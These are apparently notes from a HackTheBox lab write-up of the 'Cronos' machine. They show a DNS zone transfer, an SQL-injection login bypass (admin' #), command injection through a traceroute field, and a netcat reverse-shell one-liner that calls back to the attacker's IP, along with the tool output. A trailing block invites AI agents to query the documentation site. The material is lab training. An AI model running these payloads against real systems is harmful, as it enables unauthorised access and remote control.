# 3 :53 dns ``` # to find out domain name for this machine $ nslookup > server 10.10.10.13 Default server: 10.10.10.13 Address: 10.10.10.13#53 > 10.10.10.13 13.10.10.10.in-addr.arpa name = ns1.cronos.htb. # using zone transfer to find out the different hostnames $ host -l cronos.htb 10.10.10.13 Using domain server: Name: 10.10.10.13 Address: 10.10.10.13#53 Aliases: cronos.htb name server ns1.cronos.htb. cronos.htb has address 10.10.10.13 admin.cronos.htb has address 10.10.10.13 ns1.cronos.htb has address 10.10.10.13 www.cronos.htb has address 10.10.10.13 $ dig axfr @10.10.10.13 cronos.htb ; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 248 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Wed Aug 04 21:22:15 PDT 2021 ;; XFR size: 7 records (messages 1, bytes 203) # adding all to /etc/hosts http://admin.cronos.htb/ Login Page Using sqli authentication bypass cheatsheet, admin' # # worked http://admin.cronos.htb/welcome.php # Net Tool v0.1 # Traceroute and ping # ping is seen via tcpdump $ sudo tcpdump -i tun0 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 21:39:00.546026 IP cronos.htb > 10.10.16.161: ICMP echo request, id 15926, seq 1, length 64 21:39:00.546044 IP 10.10.16.161 > cronos.htb: ICMP echo reply, id 15926, seq 1, length 64 # so the tool is running a terminal command, lets see if we can concatenate commands traceroute 8.8.8.8;whoami;id;hostname # gives us www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) cronos # reverse shell time traceroute 8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f $ nc -lvnp 6969 listening on [any] 6969 ... connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 37930 bash: cannot set terminal process group (1372): Inappropriate ioctl for device bash: no job control in this shell www-data@cronos:/var/www/admin$ whoami;id whoami;id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@cronos:/var/www/admin$ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/cronos/3-53-dns.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.